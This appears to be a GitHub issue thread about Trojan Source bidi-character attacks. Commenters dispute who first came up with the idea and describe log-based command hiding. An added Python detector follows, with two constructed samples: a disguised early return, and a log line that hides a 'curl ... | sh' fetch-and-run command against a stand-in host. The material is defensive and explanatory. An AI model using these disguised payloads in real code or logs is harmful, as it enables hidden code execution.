Comments (9)
I believe the correct thing to do is to rephrase your paper as a variation of the above attack. Given that my attack was published 5 years ago, it seems dishonest of you to claim ownership of the idea.
from trojan-source.
Just to add to this, I'm aware of quite a few examples in prior work, but I'm not sure who originated the idea. It goes back to 2011 at least, but I wouldn't be surprised if it went back even further.
"Bug 339146 - [BiDi] Misleading display of bidirectional strings when RLO, LRO or PDF is used" (2011) by im3w1l is the earliest reference I found.
I think the main issue is the paper heavily implies you came up with the idea of using unicode tricks to backdoor code (e.g. the first sentence of the abstract), but that is clearly not true.
Edit: Seems Eclipse set the bug as private. I'd presume that's because people started commenting / contacting people involved in a decade old issue. Please don't do that, you aren't helping.
from trojan-source.
FYI, the attack I linked above used string literals as the container for the attack payload, but they modified the structure of the program, the same way that your early return or commenting out idea does. Your described attacks are nothing more than slight variations to program structure modifications that my attack already did.
from trojan-source.
Thank you for sharing this link!
We will leave this comment here on GitHub for reference to include with the history of this technique.
The attacks proposed in Trojan Source represent a much larger attack surface than string literals in Go, which as of the time of publication are still vulnerable in our tests. The commenting-out and early return techniques described in the paper also represent novel attack vectors.
from trojan-source.
Yeah, I've heard of this years ago as well lmao
from trojan-source.
I confirm that I heard of similar attacks 10 years ago.
There can also be attacks through server logs. With specially crafted requests, you can for example generate Apache or Nginx logs where you can hide commands "underneath" the IP. So if an admin tries to copy/paste the IP in a terminal, for example for a whois, you can run commands.
from trojan-source.
@JohnXLivingston lmao that's a good one
from trojan-source.
> I confirm that I heard of similar attacks 10 years ago. There can also be attacks through server logs. With specially crafted requests, you can for example generate Apache or Nginx logs where you can hide commands "underneath" the IP. So if an admin tries to copy/paste the IP in a terminal, for example for a whois, you can run commands.

whoa. how?
from trojan-source.
> whoa. how?

Same technique: you use unicode special characters to change the writing direction (for example in your user agent).
from trojan-source.
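The thread above describes two flavours of the same trick: bidirectional control characters that make rendered text (a source line, a log line) differ from its logical order, so an early return hides inside what looks like a comment, or a command hides inside what looks like a log field. The following is an added example, not code from the Trojan Source repository or from any commenter. It scans text for the Unicode bidi controls (LRE, RLE, PDF, LRO, RLO, LRI, RLI, FSI, PDI) and makes them visible, and runs over two constructed samples: a docstring in the early-return style with an RLI before the closing quotes, and an Apache-style access log line whose User-Agent carries an RLO/PDF pair. The account names, IP, URL and log contents are all made up for the illustration.

```python
import re

# Unicode bidirectional control code points. They change how text is rendered
# but not its logical order, which is what compilers, interpreters and the
# clipboard actually see.
BIDI_CONTROLS = {
    "\u202a": "LRE", "\u202b": "RLE", "\u202c": "PDF",
    "\u202d": "LRO", "\u202e": "RLO",
    "\u2066": "LRI", "\u2067": "RLI", "\u2068": "FSI", "\u2069": "PDI",
}
BIDI_RE = re.compile("[" + "".join(BIDI_CONTROLS) + "]")


def find_bidi_controls(text):
    """Return (line_no, column, name) for every bidi control in text."""
    hits = []
    for line_no, line in enumerate(text.splitlines(), start=1):
        for m in BIDI_RE.finditer(line):
            hits.append((line_no, m.start(), BIDI_CONTROLS[m.group()]))
    return hits


def strip_bidi_controls(text):
    """Remove the controls so the rendered order equals the logical order."""
    return BIDI_RE.sub("", text)


def make_visible(text):
    """Replace each control by a <NAME> marker, for safe display in a review."""
    return BIDI_RE.sub(lambda m: "<" + BIDI_CONTROLS[m.group()] + ">", text)


def compiles(source):
    """True if the Python source parses; used to show the payload is real code."""
    try:
        compile(source, "<sample>", "exec")
        return True
    except SyntaxError:
        return False


# Constructed sample in the early-return style (not the project's own file):
# the RLI makes the line render as if it ends inside the docstring, while the
# logical order closes the string and then executes ";return".
EARLY_RETURN_SAMPLE = (
    "bank = {'alice': 100}\n"
    "def subtract_funds(account, amount):\n"
    "    ''' Subtract funds from account then \u2067''' ;return\n"
    "    bank[account] -= amount\n"
)

# Constructed Apache-style access log line. The RLO in the User-Agent reverses
# the rendering of the text up to the PDF, so what the admin sees in the
# terminal no longer matches what a copy/paste puts on the clipboard.
LOG_SAMPLE = (
    '203.0.113.7 - - [01/Nov/2021:12:00:00 +0000] "GET / HTTP/1.1" 200 512 "-" '
    '"Mozilla/5.0 \u202e; curl http://attacker.invalid/x | sh\u202c"\n'
)


def scan_report(text):
    """One human-readable line per finding, for use in a pre-commit or log check."""
    return ["line %d col %d: %s" % hit for hit in find_bidi_controls(text)]


if __name__ == "__main__":
    for name, sample in (("source", EARLY_RETURN_SAMPLE), ("log", LOG_SAMPLE)):
        print("== %s ==" % name)
        for line in scan_report(sample):
            print(line)
        print(make_visible(sample))
    # The payload survives stripping: the early return is still there, it is
    # just no longer disguised, which is why detection must gate the review.
    print("stripped source still compiles:", compiles(strip_bidi_controls(EARLY_RETURN_SAMPLE)))
```

Run it as a script to see the findings and the de-obfuscated text. Wiring `scan_report` into a pre-commit hook, or feeding it access-log lines before an operator pastes anything from them, is the practical use; `strip_bidi_controls` is for display only, since removing the controls leaves the injected code in place and merely makes it readable.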
Related Issues
- Python3 returns syntax error
- Does a homoglyph function count as Trojan Source?
- Could we help developers detect and prevent issues of Trojan Source in their projects?
- invisible-function.c and homoglyph-function.c can't be built with gcc <= 9.1, but succeed with gcc 11.2
- Doubt regarding early-return.py example
- Tools to detect possible attacks
- That's a poor editor attack vector, not compiler/code/interpreter
- Provide an example of proper use for reference
- Early return and comment out in languages without closing comment token?
- Variations on Stretched String